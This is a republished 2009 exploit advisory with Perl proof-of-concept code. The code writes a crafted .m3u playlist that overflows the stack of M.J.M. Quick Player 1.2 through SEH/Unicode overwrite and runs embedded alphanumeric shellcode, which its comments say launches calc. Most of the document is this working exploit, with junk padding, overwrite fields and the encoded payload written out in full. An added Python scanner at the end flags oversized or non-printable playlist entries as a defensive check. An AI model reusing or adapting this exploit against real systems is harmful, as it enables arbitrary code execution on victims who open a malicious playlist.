M.J.M. Quick Player v1.2 Stack BOF
Source: vfocus.net  Author: corelanc0d3r  Published: 2010-01-04
# [*] Vulnerability     : M.J.M. Quick Player v1.2 Stack BOF
# [*] Discovered by     : mr_me (seeleymagic[at]hotmail[dot]com)
# [*] Sploit written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
# [*] Sploit released   : dec 28th, 2009
# [*] Type              : local and remote code execution
# [*] OS                : Windows
# [*] Product           : M.J.M. Quick Player
# [*] Versions affected : 1.2  (Latest version is not vulnerable)
# [*] Download from     : http://www.brothersoft.com/quick-player-135853.html
# [*] -------------------------------------------------------------------------
# [*] Method            : SEH / Unicode
# [*] Tested on         : XP SP3 En (VirtualBox)
# [*] Greetz&Tx to      : mr_me/EdiStrosar/Rick2600/MarkoT
# [*] -------------------------------------------------------------------------
#                                               MMMMM~.                          
#                                               MMMMM?.                          
#    MMMMMM8.  .=MMMMMMM.. MMMMMMMM, MMMMMMM8.  MMMMM?. MMMMMMM:   MMMMMMMMMM.   
#  MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:  
#  MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:  
#  MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:  
#  MMMMM=.     MMMMM=MMMMM=MMMMM7. 8MMMMM?    . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:  
#  MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:  
#  =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:  
#  .:$MMMMMO7:..+OMMMMMO$=.MMMMM7.  ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:  
#     .,,,..      .,,,,.   .,,,,,     ..,,,..   .,,,,.. .,,...,,,. .,,,,..,,,,.  
#                                                                   eip hunters
# -----------------------------------------------------------------------------
# Script provided 'as is', without any warranty. 
# Use for educational purposes only.
#
# Open file in playlist - calc !
#
print "[+] Preparing payload\n";
my $sploitfile="corelanc0d3r_quicksploit.m3u";
my $header="#EXTM3U\n\nHTTP://";
my $junk="A" x 529;
my $field1="\x41\x6d";
my $field2="\x41\x4d";  #boy I love pvefindaddr :-)
my $stuff="\x58\x6d";
$stuff=$stuff."\x05\x02\x01\x6d";
$stuff=$stuff."\x2d\x01\x01\x6d";
$stuff=$stuff."\x50\x6d\xc3";  
my $morestuff="D" x 111;
# I think this will execute calc :-)
my $shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBTKJL2HO0QU48QUQXBC1Q2L2C4MPEL80P6XLMO53VSLKOHPP1WSKOXPA";
my $payload=$header.$junk.$field1.$field2.$stuff.$morestuff.$shellcode;
print "[+] Writing payload to file\n";
open(FILE,">$sploitfile");
print FILE $payload;
close(FILE);
print "[+] Wrote ".length($payload)." bytes to ".$sploitfile."\n";
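
For defenders triaging playlist files: the script above writes a single HTTP:// entry padded with 529 filler bytes and followed by non-text bytes. The check below is an added example, not part of the original advisory or the author's code; the function name scan_m3u, the 512-byte limit and the 64-byte run threshold are assumptions chosen for illustration.

```python
# Added example (not from the original advisory): triage .m3u playlists for
# entries resembling the oversized HTTP:// line the script above writes.
import re

# Assumption: no legitimate playlist URL approaches this length. The script
# above pads its entry with 529 bytes, so 512 sits below that.
MAX_ENTRY_LEN = 512
# Assumption: a run this long of one repeated byte is filler, not a URL.
MAX_RUN_LEN = 64
# Bytes outside printable ASCII are unexpected in a plain .m3u URL.
NON_PRINTABLE = re.compile(rb"[^\x20-\x7e]")


def scan_m3u(data: bytes, max_len: int = MAX_ENTRY_LEN):
    """Return a list of (line_number, reasons) for suspicious entries."""
    findings = []
    for lineno, raw in enumerate(data.splitlines(), start=1):
        line = raw.strip()
        # Skip blank lines and directives/comments such as #EXTM3U, #EXTINF.
        if not line or line.startswith(b"#"):
            continue
        reasons = []
        if len(line) > max_len:
            reasons.append(f"entry is {len(line)} bytes (limit {max_len})")
        if NON_PRINTABLE.search(line):
            reasons.append("non-printable bytes in entry")
        # Longest run of one repeated byte: filler padding shows up here.
        longest = max(len(m.group(0))
                      for m in re.finditer(rb"(.)\1*", line, re.S))
        if longest >= MAX_RUN_LEN:
            reasons.append(f"run of {longest} identical bytes")
        if reasons:
            findings.append((lineno, reasons))
    return findings


# Constructed samples: a normal playlist and one with an oversized entry
# built from filler only (no payload bytes).
BENIGN = b"#EXTM3U\n#EXTINF:123,Artist - Title\nhttp://example.com/stream.mp3\n"
OVERSIZED = b"#EXTM3U\n\nHTTP://" + b"A" * 600 + b"\x01\x02\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(name, scan_m3u(sample))
```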


 